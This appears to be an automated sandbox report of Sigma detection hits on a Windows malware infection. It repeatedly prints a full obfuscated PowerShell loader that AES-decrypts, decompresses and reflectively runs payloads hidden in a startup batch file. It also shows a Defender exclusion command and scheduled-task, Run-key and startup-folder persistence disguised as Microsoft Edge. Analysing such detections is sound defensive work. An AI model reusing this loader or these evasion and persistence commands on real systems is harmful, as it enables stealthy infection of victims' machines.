                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7828, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', ProcessId: 8040, ProcessName: powe
                    Sigma detected: Powerup Write Hijack DLL
                    Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7340, TargetFilename: C:\Users\user\AppData\Roaming\startup_str_533.bat
                    Sigma detected: Suspicious PowerShell Parameter Substring
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispo
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_533.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_533.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_533.vbs" , ProcessId: 7640, ProcessName: wscript.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispo
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Microsoft Edge.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge
                    Sigma detected: Gzip Archive Decode Via PowerShell
                    Source: Process startedAuthor: Hieu Tran: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispo
                    Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Microsoft Edge.exe, ProcessId: 7324, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhtutyt2.ulu.ps1
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7340, TargetFilename: C:\Users\user\AppData\Roaming\startup_str_533.vbs
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7828, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', ProcessId: 8040, ProcessName: powe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7828, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Roaming\Microsoft Edge.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Roaming\Microsoft Edge.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7828, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Roaming\Microsoft Edge.exe", ProcessId: 3912, ProcessName: schtasks.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_533.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_533.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_533.vbs" , ProcessId: 7640, ProcessName: wscript.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispo
                    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ 